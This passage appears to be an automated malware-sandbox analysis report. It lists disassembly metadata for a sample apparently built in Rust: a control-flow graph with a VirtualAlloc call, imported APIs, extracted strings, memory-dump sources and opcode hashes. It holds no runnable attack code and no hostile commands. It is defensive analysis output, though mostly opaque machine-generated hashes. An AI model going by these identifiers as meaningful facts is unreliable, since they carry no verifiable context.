                                                      control_flow_graph 274 1bb8028b9b1-1bb8028bb37 275 1bb8028bb39-1bb8028bb4d 274->275 276 1bb8028bb4f-1bb8028bb5e 274->276 277 1bb8028bb64-1bb8028bc02 275->277 276->277 279 1bb8028bc08-1bb8028bc47 VirtualAlloc 277->279 280 1bb8028c2a9-1bb8028c2aa 277->280 281 1bb8028c2ac 279->281 282 1bb8028bc4d-1bb8028bc7a 279->282 283 1bb8028c2ad-1bb8028c2b5 280->283 281->283 284 1bb8028bd19-1bb8028bd2d 282->284 285 1bb8028bd33-1bb8028bd5d 284->285 286 1bb8028bc7f-1bb8028bd12 call 1bb8028dd5f 284->286 288 1bb8028be9b-1bb8028bea7 285->288 286->284 290 1bb8028bead-1bb8028bef9 288->290 291 1bb8028bd62-1bb8028bdd0 288->291 292 1bb8028bfda-1bb8028bfe5 290->292 299 1bb8028bdd6-1bb8028bde3 291->299 293 1bb8028bfeb-1bb8028bff7 292->293 294 1bb8028befe-1bb8028bf10 292->294 296 1bb8028c258-1bb8028c278 293->296 297 1bb8028bffd-1bb8028c00e 293->297 298 1bb8028bfa9-1bb8028bfc6 294->298 309 1bb8028c27e-1bb8028c286 296->309 304 1bb8028c224-1bb8028c256 297->304 305 1bb8028c014-1bb8028c02e 297->305 302 1bb8028bf15-1bb8028bf25 298->302 303 1bb8028bfcc-1bb8028bfd4 298->303 300 1bb8028bde9-1bb8028be04 299->300 301 1bb8028be92-1bb8028be94 299->301 306 1bb8028be36-1bb8028be7b 300->306 307 1bb8028be06-1bb8028be34 300->307 301->288 310 1bb8028bf27-1bb8028bf89 302->310 311 1bb8028bf8b-1bb8028bf9b 302->311 303->292 304->309 308 1bb8028c034-1bb8028c062 305->308 305->309 321 1bb8028be7d-1bb8028be8d 306->321 307->321 308->309 314 1bb8028c068-1bb8028c0b9 308->314 309->283 313 1bb8028c288-1bb8028c2a7 309->313 316 1bb8028bfa1-1bb8028bfa2 310->316 311->316 317 1bb8028c27a-1bb8028c27b 311->317 313->283 320 1bb8028c0bf-1bb8028c10a call 1bb8028b962 314->320 316->298 317->309 325 1bb8028c154-1bb8028c162 320->325 326 1bb8028c10c-1bb8028c152 320->326 321->299 325->320 327 1bb8028c168-1bb8028c170 325->327 326->327 328 1bb8028c176-1bb8028c1a2 327->328 329 1bb8028c27d 327->329 328->309 331 1bb8028c1a8-1bb8028c222 call 1bb8028dd5f call 1bb8028dd17 328->331 329->309 331->309
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2226259589.000001BB80000000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001BB80000000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1bb80000000_file.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: fdae6b7c3fcf00f9228dbd9d5a3c96208eade3a9fdb42b23f6d738a870b35c23
                                                      • Instruction ID: d6427d8665d136f31c0b79b61f9c9599c8b7dd092013e335fcbf5c71c25d1aab
                                                      • Opcode Fuzzy Hash: fdae6b7c3fcf00f9228dbd9d5a3c96208eade3a9fdb42b23f6d738a870b35c23
                                                      • Instruction Fuzzy Hash: F252A274608A8D8FDBB5EF5CC888BE937E1FB68311F544125E84DCB261DBB4DA858B40
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true
                                                      • Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$CurrentProcess$Mutex$CloseCreateHandleLibraryLoadObjectReleaseSingleWaitlstrlenmemset
                                                      • String ID: EnumerateLoadedModulesW64$SymGetOptions$SymGetSearchPathW$SymInitializeW$SymSetOptions$SymSetSearchPathW$assertion failed: len >= 0$dbghelp.dll
                                                      • API String ID: 18767598-310313858
                                                      • Opcode ID: fc5280adfdf2b7853c24edd48576d698f2f70bb9135b4bc86369705f9db9025e
                                                      • Instruction ID: adeb9ca79c027783d1a675311c4835ad36b1fc5761be14ca3fddebf411baedc6
                                                      • Opcode Fuzzy Hash: fc5280adfdf2b7853c24edd48576d698f2f70bb9135b4bc86369705f9db9025e
                                                      • Instruction Fuzzy Hash: 57F1BE21A59A4285FB10ABA5EC007BDE7A0FF58748F844536DD5D43BA4EF3EE144CB28
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true
                                                      • Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$CurrentProcessmemset
                                                      • String ID: ($SymAddrIncludeInlineTrace$SymFromInlineContextW$SymGetLineFromInlineContextW$SymQueryInlineTrace$X
                                                      • API String ID: 3017635649-489855731
                                                      • Opcode ID: 91fedcdd78195c4bbe2e5efc2779d755cb09886c5593213c54159d6beb6d4a23
                                                      • Instruction ID: df662d09b0f99cab3fb5331d0323fabe44b7da260722a165a1c578f4a319ddb7
                                                      • Opcode Fuzzy Hash: 91fedcdd78195c4bbe2e5efc2779d755cb09886c5593213c54159d6beb6d4a23
                                                      • Instruction Fuzzy Hash: 4102CF32A49A8182EB759B54EC413FAF7A0FB88794F804236DA9D03B94DF3ED544CB54
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true
                                                      • Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                      • String ID:
                                                      • API String ID: 313767242-0
                                                      • Opcode ID: 1f7091696ee9927cd8a0f810869b6f58b34cd09c9738cf120ea40d67f48f4156
                                                      • Instruction ID: dd8839da49120a9180ee648cec52d676759c809c82405054637e75f96b04d73a
                                                      • Opcode Fuzzy Hash: 1f7091696ee9927cd8a0f810869b6f58b34cd09c9738cf120ea40d67f48f4156
                                                      • Instruction Fuzzy Hash: 6C316372645B8186EB609FA1EC403EDB760FB48744F84403ADA4D47794DF39D648CB14
                                                      APIs
                                                      Strings
                                                      • NTDLL.DLL, xrefs: 00007FF72877D645
                                                      • assertion failed: self.is_char_boundary(new_len)/rustc/9b00956e56009bab2aa15d7bff10916599e3d6d6\library\alloc\src\string.rs, xrefs: 00007FF72877D990
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true
                                                      • Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd
                                                      Similarity
                                                      • API ID: ErrorFormatHandleLastMessageModulememset
                                                      • String ID: NTDLL.DLL$assertion failed: self.is_char_boundary(new_len)/rustc/9b00956e56009bab2aa15d7bff10916599e3d6d6\library\alloc\src\string.rs
                                                      • API String ID: 1434010500-1267143961
                                                      • Opcode ID: a2fdf3f50ade1514b8e8d220692a852cc6b1829e34b8d44ffabc660db15a48ab
                                                      • Instruction ID: d53d2e9cc29889f5fb7fd97d0ba4ebc3a66d31672238ed29bf7a9191b6608c4b
                                                      • Opcode Fuzzy Hash: a2fdf3f50ade1514b8e8d220692a852cc6b1829e34b8d44ffabc660db15a48ab
                                                      • Instruction Fuzzy Hash: C4A1C532A49BC284E7719FA0DC407F8EA60FB58394F844137CA9D06BD9DF79A285DB14
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true
                                                      • Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd
                                                      Similarity
                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                      • String ID:
                                                      • API String ID: 2933794660-0
                                                      • Opcode ID: 294a0a96a0f81ae7afaf7b16e31fb50118d3dcf11c965d61aa8162dd32814fe9
                                                      • Instruction ID: 390e8cbf0f0a865759ecbfc6606b53ff7f4d8218f1218ece74ac5de5d8941eef
                                                      • Opcode Fuzzy Hash: 294a0a96a0f81ae7afaf7b16e31fb50118d3dcf11c965d61aa8162dd32814fe9
                                                      • Instruction Fuzzy Hash: 83118C22B64B058AEB009FB0EC452A8B3A4FB1C758F840A36DA6D427A4EF78D1548750
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true
                                                      • Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0123456789abcdefBorrowMutErroralready borrowed: $\u${$}
                                                      • API String ID: 0-3106430205
                                                      • Opcode ID: 668c33013664040ba518dc7ce19817bebfd1056e8c89eb43a39861d698a28efc
                                                      • Instruction ID: fd15c1eb7c16749a173c56c4a725100721798d7d320ec6ae42ebc40f0809029f
                                                      • Opcode Fuzzy Hash: 668c33013664040ba518dc7ce19817bebfd1056e8c89eb43a39861d698a28efc
                                                      • Instruction Fuzzy Hash: 35517D5372C6D082D3219764AC4062EFE52DBDA340F48D266F6DA07BDACA3ED001DF25
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2227514021.000001BB80981000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001BB80981000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1bb80981000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $X&
                                                      • API String ID: 0-100112515
                                                      • Opcode ID: a9503aaca9b58ebbdf8d4c13425dc132b67dfa860aa8f076a81decd7104407ab
                                                      • Instruction ID: 5bf5588cf83f89886b78c10820086d46da24ec282aaf9dc9928248bd533ebcbd
                                                      • Opcode Fuzzy Hash: a9503aaca9b58ebbdf8d4c13425dc132b67dfa860aa8f076a81decd7104407ab
                                                      • Instruction Fuzzy Hash: 0243E47542DAC4C9F712DB2CFC8A7E4B7A4FB99380F445316D885966F2EBB45288C384
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true
                                                      • Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .llvm./rust/deps\rustc-demangle-0.1.23\src\lib.rs$__ZN$`fmt::Error`s should be impossible without a `fmt::Formatter`
                                                      • API String ID: 0-487299250
                                                      • Opcode ID: 79fcf483fa33773ce691d94b235fc4f862f681df640f059c50c92a912db8ff91
                                                      • Instruction ID: 46b43be9a39c966426a54455a08667584f351128e245beca8e0695186f9728b3
                                                      • Opcode Fuzzy Hash: 79fcf483fa33773ce691d94b235fc4f862f681df640f059c50c92a912db8ff91
                                                      • Instruction Fuzzy Hash: 2A626C62E4C59151E620A7909C083BEE751FB49394FC44237EAAD077C6DF3ED544EB28
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true
                                                      • Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd
                                                      Similarity
                                                      • API ID: ErrorFileObjectSingleStatusWaitWrite
                                                      • String ID:
                                                      • API String ID: 3447438843-0
                                                      • Opcode ID: e2a69725430296ec90bba5f14898161efa67951fb34cc5b1c4e05999cb81cf97
                                                      • Instruction ID: 4adbad9f238f5df9855f84570eded4904e3cc9bac9e93d1ce3f062024c402c65
                                                      • Opcode Fuzzy Hash: e2a69725430296ec90bba5f14898161efa67951fb34cc5b1c4e05999cb81cf97
                                                      • Instruction Fuzzy Hash: 7B316132A08BC182E760DB64F8507AAF3A1FB98354F908135E69D82B98DF7DD585CF00
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true
                                                      • Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd
                                                      Similarity
                                                      • API ID: memset
                                                      • String ID: punycode{-}0
                                                      • API String ID: 2221118986-2450133883
                                                      • Opcode ID: dfbd434eb1d611face5466c5bed115bbe311645db7e00bfd26a6144d3211caa2
                                                      • Instruction ID: 3e0c16a7f9ca1a4f19cadc0d2cc99aaa24d1db7e6e579eabd38604420f1933e5
                                                      • Opcode Fuzzy Hash: dfbd434eb1d611face5466c5bed115bbe311645db7e00bfd26a6144d3211caa2
                                                      • Instruction Fuzzy Hash: 69E19A22FAC64142FA109B95EC04779E642EB6D7D5F848232DE5D037D4DE3EEC41AB24
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true
                                                      • Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0x00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899$from_str_radix_int: must lie in the range `[2, 36]` - found
                                                      • API String ID: 0-2226122506
                                                      • Opcode ID: 72a713cf5a32874949547b86eb10e02b097d68aa69b7745b4fcf3705ff8252ee
                                                      • Instruction ID: 08dee5cab040a8555c86d39228d08ad02584c432ee1bd9cc9465386a3a9bd3eb
                                                      • Opcode Fuzzy Hash: 72a713cf5a32874949547b86eb10e02b097d68aa69b7745b4fcf3705ff8252ee
                                                      • Instruction Fuzzy Hash: 26913522E1819581E369AB64BC147F9E361FB88344FC0513ADA8F43BD0DF2ED645DB68
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true
                                                      • Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd
                                                      Similarity
                                                      • API ID: memset
                                                      • String ID:
                                                      • API String ID: 2221118986-0
                                                      • Opcode ID: 1f4c41466cc6df515a87f760613ccb3ca0049bc07932047d7481ce43c1db1c99
                                                      • Instruction ID: a0493a99a0b977365e73384df463780733848a52899cb4033caeb1676ea5851d
                                                      • Opcode Fuzzy Hash: 1f4c41466cc6df515a87f760613ccb3ca0049bc07932047d7481ce43c1db1c99
                                                      • Instruction Fuzzy Hash: 7E824962F5869245E3A09BA09C107BCEF61EB19394FC40233ED6D03BC9DE2AD466D774
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true
                                                      • Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd
                                                      Similarity
                                                      • API ID: ErrorHandleLast
                                                      • String ID:
                                                      • API String ID: 2586478127-0
                                                      • Opcode ID: 9341782d1dba5dca5234e11f472c47f37a0e1ff99b0679544f72d2fe044df327
                                                      • Instruction ID: af2dd1e9305aac5eda464eed4b68ef17d0cd8bf9f00b3cc430c4748e9b874fc3
                                                      • Opcode Fuzzy Hash: 9341782d1dba5dca5234e11f472c47f37a0e1ff99b0679544f72d2fe044df327
                                                      • Instruction Fuzzy Hash: 31F1F162B59A4282FE14AB95EC00679E261FF187D4F848536DE1D07B84EF3EE451CB2C
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true
                                                      • Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd
                                                      Similarity
                                                      • API ID: memmove
                                                      • String ID:
                                                      • API String ID: 2162964266-0
                                                      • Opcode ID: cbdc7e5dc7798522b174867b53fafbef8ab12bb26503c776031c683909a68ccf
                                                      • Instruction ID: 1f22b2b3f1754c237cb68150cc6da9c7a20ea10d7cef215ee5703ba17858fb80
                                                      • Opcode Fuzzy Hash: cbdc7e5dc7798522b174867b53fafbef8ab12bb26503c776031c683909a68ccf
                                                      • Instruction Fuzzy Hash: 5B12F6736582E08BE355CBA9DC44A7DBBB1E75D384FC68127EB8907781CA3AD500DB60
                                                      Strings
                                                      • from_str_radix_int: must lie in the range `[2, 36]` - found , xrefs: 00007FF72878AB98
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true
                                                      • Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: from_str_radix_int: must lie in the range `[2, 36]` - found
                                                      • API String ID: 0-1882762191
                                                      • Opcode ID: 460ba6645ae707744da542d059db03f4c51757b6cc5626f26ad615b6692aa300
                                                      • Instruction ID: 47dfc18e6d48574aac775cc862d43371f2a883fdbde91d4d3b8842e9b2d26ead
                                                      • Opcode Fuzzy Hash: 460ba6645ae707744da542d059db03f4c51757b6cc5626f26ad615b6692aa300
                                                      • Instruction Fuzzy Hash: B8B1AE82E2D75602F62353795C016B5C900DF637A4E81D337FC7E71BE1EB2AE652A218
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true
                                                      • Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd
                                                      Similarity
                                                      • API ID: HeapProcess
                                                      • String ID:
                                                      • API String ID: 54951025-0
                                                      • Opcode ID: 28428828bad923571c30b861f45577c2f35768ba7fc3d210bc9edf6ae415edcb
                                                      • Instruction ID: 41a687c10f48d2c18a712c8e51b090a3acd6d25ff91975345459b5ec68f34a9c
                                                      • Opcode Fuzzy Hash: 28428828bad923571c30b861f45577c2f35768ba7fc3d210bc9edf6ae415edcb
                                                      • Instruction Fuzzy Hash: 36F03716F9A90181E95967567C4057CD691DF8CBA0ED44436CD0D46360FE2D69C29B24
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true
                                                      • Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ad03831d6827479ebb28a3cefdf88df5135b88cfc4be81a9df0b0410040f847d
                                                      • Instruction ID: 1cf9dbbd20f4c88eaa1123693560305e75d4665232d6a57467d7a2ee79595ae3
                                                      • Opcode Fuzzy Hash: ad03831d6827479ebb28a3cefdf88df5135b88cfc4be81a9df0b0410040f847d
                                                      • Instruction Fuzzy Hash: AC225A13E18BE145F71267789C026BDD710FF9E3D8F804336EEAA12B96CF3992419664
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true
                                                      • Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 32c2448ebe5a50def6f04e3c7e67afb044d3115d6d412b9f67dc801a094f2e23
                                                      • Instruction ID: 0f4b9b3e62dc365335974c029f0991f2ab14a33ec8510c22ca4ba9fa799cc08b
                                                      • Opcode Fuzzy Hash: 32c2448ebe5a50def6f04e3c7e67afb044d3115d6d412b9f67dc801a094f2e23
                                                      • Instruction Fuzzy Hash: DFF1F8B39142F04BE394DF2E8C1426ABAE6F385381F85C23BEB4943395DA39C415DB55
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true
                                                      • Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8523f3c577c8977e713c9cf5d616fb9940ab0c18501afc26cfb7e2635d707df0
                                                      • Instruction ID: 3a5d0f3f397891ee3b00472ed50ffbc17e8509d5af6b4d694c9dcf007c7274b1
                                                      • Opcode Fuzzy Hash: 8523f3c577c8977e713c9cf5d616fb9940ab0c18501afc26cfb7e2635d707df0
                                                      • Instruction Fuzzy Hash: 1FD12722B586D249E7609AA0CC103BDFF61E714798F854233DE6E07BD8DB3AC4A5C764
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true
